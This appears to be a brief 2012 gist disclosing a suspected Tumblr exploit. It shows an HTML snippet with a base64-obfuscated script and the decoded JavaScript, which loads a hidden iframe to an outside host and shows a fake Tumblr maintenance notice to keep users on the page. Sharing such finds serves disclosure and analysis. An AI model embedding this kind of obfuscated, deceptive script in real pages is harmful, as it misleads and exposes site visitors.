Possible Tumblr exploit found in the wild, 12/03/2012

gistfile1.html

<div class="the-video hideflash"><script src="data:text/plain;base64,dmFyIGZyYW1la2lsbGVyID0gdHJ1ZTsNCg0Kd2luZG93Lm9ubG9hZCA9IGZ1bmN0aW9uKCl7DQogIGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdsYXBwZXInKS5zcmMgPSAiaHR0cDovL2kuaG9wZS55b3UuZ2V0LnN0cmFuZ2xlZC5uZXQiOw0KfQ0KDQp3aW5kb3cub25iZWZvcmV1bmxvYWQgPSBmdW5jdGlvbigpIHsgDQogIGlmKGZyYW1la2lsbGVyKSB7DQogICAgcmV0dXJuICJOb3RpY2U6IFR1bWJsciB3aWxsIGJlIHVuZGVyZ29pbmcgbWFpbnRlbmFuY2Ugb24gRGVjZW1iZXIgNHRoIDIwMTIgYXQgMDE6MDAgQU0gZm9yIHNldmVyYWwgaG91cnMuXG5cbiBXZSBjYW5ub3QgZm9yZWNhc3QgZm9yIGV4YWN0bHkgaG93IGxvbmcsIHVuZm9ydHVuYXRlbHkuXG4gV2UgYXBvbG9naXplIGZvciB0aGUgaW5jb252ZW5pZW5jZS5cblxuWW91IG1heSBub3cgZGlzbWlzcyB0aGlzIG1lc3NhZ2UgdmlhICdDYW5jZWwvU3RheSBvbiB0aGlzIHBhZ2UnLiBUaGFuayB5b3UuIjsgIC8vIGFueSBtZXNzYWdlIHRoYXQgaGVscHMgdXNlciB0byBtYWtlIGRlY2lzaW9uDQogIH0NCn07"></script><iframe id="lapper" width="0" height="0" style="opacity: 0;"></iframe></div>

Decoded:

/*

var framekiller = true;

window.onload = function(){
  document.getElementById('lapper').src = "http://i.hope.you.get.strangled.net";
}

window.onbeforeunload = function() { 
  if(framekiller) {
    return "Notice: Tumblr will be undergoing maintenance on December 4th 2012 at 01:00 AM for several hours.\n\n We cannot forecast for exactly how long, unfortunately.\n We apologize for the inconvenience.\n\nYou may now dismiss this message via 'Cancel/Stay on this page'. Thank you.";  // any message that helps user to make decision
  }
};

*/

-->

The iFrame request appears to return a 301, and it's unclear to me exactly how that causes the onbeforeunload notice in the parent window. I only spent a few minutes digging. :)